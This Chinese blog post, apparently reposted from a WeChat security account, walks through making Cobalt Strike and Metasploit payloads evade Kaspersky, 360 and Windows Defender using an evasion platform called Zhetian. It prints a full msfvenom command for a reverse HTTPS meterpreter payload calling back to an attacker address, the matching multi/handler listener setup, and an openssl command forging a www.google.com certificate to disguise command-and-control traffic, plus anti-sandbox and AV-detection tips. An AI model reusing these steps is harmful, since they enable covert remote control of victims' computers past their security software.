遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行…

渗透技巧 1年前 (2022) admin
1,260 0 0

zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令…

测试目标:Windows Defender、卡巴斯基、360安全士极速版

系统环境:win10 64位   

软件版本:4.7破解版、msf社区免费版 

流量通信:http与https

测试平台:遮天对抗平台,地址:zTian.red

测试时间:2022-11-16

一、Cobalt Strike ShellCode免杀测试:

开始:

使用默认无修改teamserver配置,直接运行服务。遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

添加两个监听,然后生成payload文件。出payload时文件类型可以选择C、Java、Python。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

打开遮天对抗平台,选中要进行测试的payload文件。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

选中payload,填入获取到的私钥,然后提交任务。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

先各生成一个免杀文件:

DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)

测试绕过360安全防护:

另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

下载使用http流量的程序,没想到却无任何反应。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

云查杀无异常且可以动态执行命令。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

测试绕过Windows Defender:

在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

运行https,未被拦截,且可以执行命令。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

测试绕过卡巴斯基:

不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

重新提交任务,勾选智能反沙箱。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

再次扫描成功绕过。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

是反沙箱模块需要诸多条件,如禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

经过十几秒的等待,成功上线。执行命令,完美响应

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...


总结

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

360安全卫士静态识别出了https类型程序,没有检测到http类型程序。

Windows Defender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。

卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。


二、MSF免杀测试:

 由于我对MSF用法不是那么熟悉,以下仅测试一种方案:

使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

使用ssl加密流量测试绕过。先生成证书,执行命令:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt && cat www.google.com.key www.google.com.crt>www.google.com.pem && rm -f www.google.com.key www.google.com.crt

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

之后在绝对路径可以看到证书文件

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

再执行命令生成payload:

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=172.21.194.45  LPORT=8789 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f c

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

生成完毕之后进入msf控制台执行监听命令:

use exploit/multi/handler set payload windows/meterpreter/reverse_winhttpsset lhost 0.0.0.0set lport 4444set HandlerSSLCert /home/kali/google.pemset StagerVerifySSLCert true set IgnoreUnknowPayloads trueset exitonsession falseexploit

复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

生成后直接执行,获取到session

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

使用进入meterpreter之后完美执行命令且无拦截。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

扩展:识别Anti Virus进程方式:

执行命令“TASKLIST /SVC”  然后将得到的结果粘贴至下方识别栏里进行识别。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

识别出卡巴斯基。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

原文始发于微信公众号(遮天实验室):遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行…

版权声明:admin 发表于 2022年11月16日 上午10:45。
转载请注明:遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行… | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...